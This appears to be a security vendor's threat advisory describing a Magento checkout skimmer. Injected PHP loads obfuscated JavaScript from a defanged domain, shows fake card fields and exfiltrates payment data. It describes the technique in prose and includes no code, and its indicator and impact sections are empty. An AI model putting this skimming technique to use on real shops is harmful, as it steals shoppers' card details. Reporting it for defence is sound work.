Rewterz penetration testing services help organizations determine if a cyber attacker can gain access to their critical assets while giving them detailed insights of the overall business impact of a cyber attack.
Before Rewterz got its start, the market was in dire need of a specialized and dedicated information security company. It was nearly impossible for businesses to find a trustworthy provider that could truly cover all of their bases. We wanted to meet this need, giving companies across the globe a chance to get ahead while knowing that their data is in good hands.
Rewterz penetration testing services help organizations determine if a cyber attacker can gain access to their critical assets while giving them detailed insights of the overall business impact of a cyber attack.
Before Rewterz got its start, the market was in dire need of a specialized and dedicated information security company. It was nearly impossible for businesses to find a trustworthy provider that could truly cover all of their bases. We wanted to meet this need, giving companies across the globe a chance to get ahead while knowing that their data is in good hands.
Severity
Medium
Analysis Summary
A suspicious activity was seen on a Magento site. The following checkout pages look slightly different with the one on the right being the suspicious site. It was found that a skimmer had injected its own credit card fields on the altered checkout page.
The text below the credit card field specifically triggered the researchers as it says:
“Then you will be redirected to PayuCheckout website when you place an order.”
Even though online merchants use such forms (including iframes) as part of their checkout pages, what’s suspicious is that the users will be redirected to another checkout page (this time legitimate) to enter their credit card details again.
Having to enter their details twice should be a red flag because it’s a common scenario in case of phishing sites.
Upon further research, Injected code was found to be present in all the PHP pages of that site, but it only triggered if the current URL in the address bar was the shopping cart checkout page (onestepcheckout).
If the right conditions are met, an external piece of JavaScript is loaded from thatispersonal[.]com. However, directly browsing to this URL without the correct referer (one of the hacked Magento sites) will return a decoy script instead. The complete script is largely obfuscated and creates the iframe-box we saw above for harvesting credit card details.
It also loads another obfuscated long script ([hackedsite]_iframe.js) to process, validate, and then exfiltrate the user data.
Impact
Indicators of Compromise
URLs
Remediation
Block the threat indicators at your respective controls